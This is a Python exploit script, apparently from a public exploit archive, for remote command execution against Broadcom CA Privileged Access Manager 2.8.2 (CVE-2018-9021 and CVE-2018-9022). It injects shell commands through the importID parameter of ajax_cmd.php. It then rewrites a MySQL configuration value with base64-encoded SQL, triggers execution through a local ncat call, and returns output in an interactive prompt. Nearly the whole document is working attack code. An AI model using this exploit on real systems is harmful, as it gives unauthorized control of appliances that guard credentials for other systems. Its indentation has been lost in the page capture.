Share
# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution  
# Author: Peter Lapp  
# Date: 2019-12-05  
# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html  
# CVE: CVE-2018-9021 and CVE-2018-9022  
# Tested on: v2.8.2  
  
import urllib2  
import urllib  
import ssl  
import sys  
import json  
import base64  
  
  
ctx = ssl.create_default_context()  
ctx.check_hostname = False  
ctx.verify_mode = ssl.CERT_NONE  
  
  
def send_command(ip, cmd):  
cmd = urllib.quote_plus(cmd)  
url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'  
request = urllib2.Request(url, None)  
response = urllib2.urlopen(request, context=ctx)  
result = json.load(response)  
return result['responseData']  
  
def get_db_value():  
cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"  
db_value = send_command(ip,cmd)  
db_value = db_value.split('\n')[1]  
return db_value  
  
def encode_payload(cmd):  
sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'"  
cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "  
return cmd  
  
def restore_sql(value):  
sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"  
cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "  
send_command(ip,cmd)  
  
def main():  
print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''  
  
if len(sys.argv) != 2:  
print "Usage: xceedium_rce.py <target ip>"  
sys.exit()  
  
global ip  
ip = sys.argv[1]  
print 'Enter commands below. Type exit to quit'  
  
while True:  
cmd = raw_input('# ')  
if cmd == "exit":  
sys.exit()  
orig_value = get_db_value()  
payload = encode_payload(cmd)  
send_command(ip, payload)  
send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')  
output = send_command(ip, 'cat /tmp/output')  
print output  
restore_sql(orig_value)  
  
  
  
if __name__ == "__main__":  
main()